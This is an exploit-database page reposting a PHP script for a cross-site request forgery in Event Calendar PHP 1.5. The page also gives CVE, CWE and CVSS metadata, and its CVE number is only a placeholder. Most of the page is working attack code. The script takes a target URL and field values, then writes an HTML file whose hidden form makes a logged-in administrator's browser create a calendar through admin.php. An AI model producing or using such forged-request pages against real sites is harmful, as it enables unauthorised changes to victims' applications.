Advertisement






Event Calendar PHP 1.5 Cross Site Request Forgery

CVE Category Price Severity
CVE-2020-XXXX CWE-352 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2016-10-22
CVSS EPSS EPSSP
CVSS:4.0/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2016100208

Below is a copy:

Event Calendar PHP 1.5 Cross Site Request Forgery<?php
#=====================================================
# Event Calendar PHP 1.5 - Cross-Site Request Forgery
#=====================================================
# Vendor Homepage: http://eventcalendarphp.com/
# Date: 21 Oct 2016
# Demo Link : http://eventcalendarphp.com/eventcalendar/admin.php
# Version : 1.5
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: [email protected]
#=====================================================
print "
#######################################################################
#                   Event Calendar PHP 1.5 CSRF              #
#                   Discovered By Ehsan Hosseini                      #
#                  Ashiyane Digital Security Team                     #
#                          We Love Leader                             #
#######################################################################\n\n";
print 'Enter Site Url (localhost): ';
$site = htmlspecialchars(trim(fgets(STDIN,256)));
print 'Enter Calender Name: ';
$cal_name = htmlspecialchars(trim(fgets(STDIN,256)));
print 'Enter Description Name: ';
$description = htmlspecialchars(trim(fgets(STDIN,256)));

$poc = "<html>
<!-- CSRF PoC -->
<body>
<form action='http://$site/admin.php' method='post' name='form' enctype='multipart/form-data'>
<input type='hidden' name='act' value='addCal'>
<input type='hidden' name='cal_name' value='$cal_name'>
<input type='hidden' name='description' value='$description'>
<input name='submit' type='submit' value='Create Calendar'>
</form>
</body>
</html>";
print 'Enter Exploit name (csrfpoc)';
$pocname = trim(fgets(STDIN,256));

$exploit = fopen("$pocname.html", "w");
fwrite($exploit, $poc);
fclose($exploit);
#=====================================================
# Discovered By : Ehsan Hosseini
#=====================================================
?>


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum